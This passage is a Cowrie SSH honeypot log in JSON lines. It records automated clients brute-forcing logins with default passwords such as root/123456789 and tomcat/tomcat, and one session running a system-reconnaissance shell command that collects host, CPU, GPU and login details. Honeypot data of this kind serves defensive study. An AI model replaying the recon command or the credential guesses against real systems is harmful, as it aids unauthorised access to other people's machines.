llman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:56:03.454544Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45026,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4b2fd1fb389","protocol":"ssh","message":"New connection: 212.227.235.229:45026 (1.2.3.4:22) [session: e4b2fd1fb389]","sensor":"my-vps","timestamp":"2025-08-31T04:56:04.240823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:04.242765Z","src_ip":"212.227.235.229","session":"e4b2fd1fb389"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:04.261522Z","src_ip":"212.227.235.229","session":"a35813128eaa"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:04.504792Z","src_ip":"212.227.235.229","session":"e4b2fd1fb389"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:56:05.752245Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"aerohive","message":"login attempt [admin/aerohive] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.510170Z","src_ip":"212.227.235.229","session":"e4b2fd1fb389"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:56:06.768780Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.769629Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.770080Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.771022Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.772486Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.773339Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.774484Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.775679Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.776193Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.776693Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.777444Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.778119Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:56:06.778856Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:07.009143Z","src_ip":"212.227.235.229","session":"a35813128eaa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:56:07.352488Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:07.353388Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:07.354462Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:07.771086Z","src_ip":"212.227.235.229","session":"e4b2fd1fb389"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:08.289115Z","src_ip":"212.227.235.229","session":"a35813128eaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35082,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2dbd79ff71e","protocol":"ssh","message":"New connection: 212.227.125.160:35082 (1.2.3.4:22) [session: e2dbd79ff71e]","sensor":"my-vps","timestamp":"2025-08-31T04:56:12.067353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:12.068627Z","src_ip":"212.227.125.160","session":"e2dbd79ff71e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:12.257638Z","src_ip":"212.227.125.160","session":"e2dbd79ff71e"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:12.825680Z","src_ip":"212.227.125.160","session":"e2dbd79ff71e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:14.015825Z","src_ip":"212.227.125.160","session":"e2dbd79ff71e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41718,"dst_ip":"1.2.3.4","dst_port":22,"session":"83a77d558a19","protocol":"ssh","message":"New connection: 212.227.235.229:41718 (1.2.3.4:22) [session: 83a77d558a19]","sensor":"my-vps","timestamp":"2025-08-31T04:56:16.628497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:16.684287Z","src_ip":"212.227.235.229","session":"83a77d558a19"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:16.867968Z","src_ip":"212.227.235.229","session":"83a77d558a19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47770,"dst_ip":"1.2.3.4","dst_port":22,"session":"9116834cfd33","protocol":"ssh","message":"New connection: 212.227.125.160:47770 (1.2.3.4:22) [session: 9116834cfd33]","sensor":"my-vps","timestamp":"2025-08-31T04:56:17.434456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:17.435253Z","src_ip":"212.227.125.160","session":"9116834cfd33"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:17.617985Z","src_ip":"212.227.125.160","session":"9116834cfd33"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:18.168760Z","src_ip":"212.227.125.160","session":"9116834cfd33"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:19.354074Z","src_ip":"212.227.125.160","session":"9116834cfd33"}
{"eventid":"cowrie.login.failed","username":"reception","password":"reception","message":"login attempt [reception/reception] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:20.564097Z","src_ip":"212.227.235.229","session":"83a77d558a19"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:22.071630Z","src_ip":"212.227.235.229","session":"83a77d558a19"}
